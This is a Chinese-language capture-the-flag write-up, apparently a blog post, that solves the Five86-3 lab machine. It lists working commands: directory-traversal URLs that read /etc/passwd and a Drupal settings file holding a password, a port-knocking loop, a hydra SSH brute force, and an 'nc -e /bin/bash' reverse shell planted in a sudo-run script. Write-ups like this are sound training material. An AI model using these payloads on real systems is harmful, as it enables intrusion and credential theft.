靶机信息
靶机下载地址:https://www.five86.com/five86-3.html
下载好靶机解压后,直接打开文件夹里的.ova文件即可
将靶机设置为NAT模式后,kali和靶机为同一网段
信息搜集
使用nmap扫描同网段的信息,筛选出目标ip地址
nmap -sn 192.168.74.0/24
对目标主机做进一步的扫描
信息比较少,只有一个80端口的信息
nmap -A 192.168.74.138
漏洞利用
访问网站发现为drupal站点,版本为drupal 7,但是没有具体的版本号
搜了下漏洞,试了几个sql注入和rce发现用不了
最后是发现有个目录遍历的漏洞
查看利用方法
根据漏洞文档的内容构造url如下,读取到passwd内容
http://192.168.74.138/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
构造url查看drupal配置文件路径
http://192.168.74.138/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../var/www/html/sites/default/settings.php
查看源代码看起来方便些,找到个密码x4lB0XxX,但是缺少用户名
根据passwd文件中的/bin/bash可以判断有4个可登录的用户
使用用户名和密码尝试登录站点,都失败了,密码可能不是站点的
passwd文件里发现了有sshd账号,可能有过滤的措施导致扫描的时候没有发现
现在只能查看文件没法使用命令,无法确定是什么进程导致扫描不到端口
这时候可以通过查看cpu任务调度的文件来查看进程
发现一个特殊的进程knockd,需要指定的方式才能访问到端口,也叫端口敲门
http://192.168.74.138/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../proc/sched_debug
查看knockd进程配置文件,需要依次向22端口发送5004,4284,6872
view-source:http://192.168.74.138/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/knockd.conf
使用nmap敲击端口,再次扫描22端口后为开放状态
for x in 5004 4284 6872;do nmap -Pn --max-retries 0 -p $x 192.168.74.138;done
把用户名写到文本中当做用户名字典,然后进行暴破,发现为sam账户的密码
hydra -L user.txt -p x4lB0XxX -t 5 -v ssh://192.168.74.138
权限提升
登录到sam账户
ssh -l sam 192.168.74.138
sudo -l发现有个脚本文件,是一个重启apache的脚本
有编辑权限,可以尝试反弹shell到kali上
sudo执行脚本后获取到管理权限,不sudo执行的话脚本无法执行,而且弹上去还是普通用户权限
nc 192.168.74.129 666 -e /bin/bash
nc -lvp 666
最后在root目录下获取到flag
标签:..,Five86,端口,sites,192.168,测试,靶机,74.138 From: https://blog.51cto.com/Jach1n/5734863